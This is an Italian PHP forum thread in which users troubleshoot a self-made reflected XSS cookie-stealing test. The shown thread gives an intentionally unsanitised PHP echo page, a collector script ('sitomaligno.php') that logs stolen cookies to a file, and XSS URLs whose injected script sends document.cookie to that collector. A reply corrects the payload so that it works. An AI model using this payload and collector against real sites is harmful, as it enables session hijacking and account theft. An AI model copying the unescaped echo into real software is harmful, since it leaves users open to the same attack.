Questo sito utilizza cookies, anche di terze parti, per mostrare pubblicità e servizi in linea con il tuo account. Leggi l'informativa sui cookies.
Username: Password: oppure
PHP - [XSS] Test attacco Hacker Cookie Stealing
Forum - PHP - [XSS] Test attacco Hacker Cookie Stealing

Avatar
lomiz (Normal User)
Rookie


Messaggi: 26
Iscritto: 09/11/2005

Segnala al moderatore
Postato alle 23:08
Domenica, 18/06/2006
Coltivando la mia grande passione per l'Hacking oggi ho provato a testare sul mio sito il cookie stealing attraverso il Cross Site Scripting.

Ho quindi creato una pagina web sul mio sito, xss.php.

Ho inserito questo codice php:

Codice:
<?php
$var = $_GET['message'];
echo "$var";
?>


Che DOVREBBE essere bugguto e vulnerabile da XSS in quanto non c'è un controllo sul carattere <.

Ho quindi creato un altra pagina: sitomaligno.php

con questo codice:
Codice:
<html>
<head>
<title>prova</title>
</head><body>
<h1>Not Found</h1>
<?php
$data = $_GET['data'];
$fh = fopen("cookie.txt",'a+');
fwrite($fh, "$data"."\n");
fclose($fh);
?>
<p>dovrei averti rubato i cookie</p>
</body></html>


Adesso se non sbaglio dal momento che la vittima andasse qua:
http://theninjateam.altervista.org/hacktest/xss/sitomalign ...'>http://theninjateam.altervista.org/hacktest/xss/xss.php?&l ...=" + document.cookie</script>

Dovrei avergli rubato i cookie.
Ma tutto cio' non funziona.
Mi direte: "ovvio che non rubi i cookie... non gliel'hai dati..."

Ma non mi si forma alcun file cookie.txt quando se ne dovrebbe formare uno vuoto...

Il bello è che quando vado nel link http://theninjateam.altervista.org/hacktest/xss/sitomalign ...'>http://theninjateam.altervista.org/hacktest/xss/xss.php?&l ...=" + document.cookie</script> non mi carica nemmeno la pagina sitomaligno.php...

Cos'ho sbagliato?

PM Quote
Avatar
radio (Ex-Member)
Expert


Messaggi: 327
Iscritto: 03/03/2005

Segnala al moderatore
Postato alle 20:56
Sabato, 24/06/2006
beh la prima pagina giustamente non ti scrive nulla se non metti message= dopo il '?'

quindi..

http://theninjateam.altervista.org/hacktest/xss/xss.php? message=<script>window.location="http://theninjateam.altervista.org/hacktest/xss/sitomalign ...=" + document.cookie</script>

[senza lo spazio, l'ho messo per no llungare tropp la pag ;-)]

cmq io non me ne intendo di xss, ma penso che se non posti "messagge" quindo lui fa l'echo di $_GET["message"] giustametne non ha nulla...


______

Radio.
PM Quote
Avatar
nicia (Normal User)
Newbie


Messaggi: 1
Iscritto: 18/09/2006

Segnala al moderatore
Postato alle 17:09
Lunedì, 18/09/2006
il codice giusto dovrebbe essere il seguente. Dico dovrebbe nel caso abbia saltato qlcs ma nn dovrei. Provandolo in locale funziona!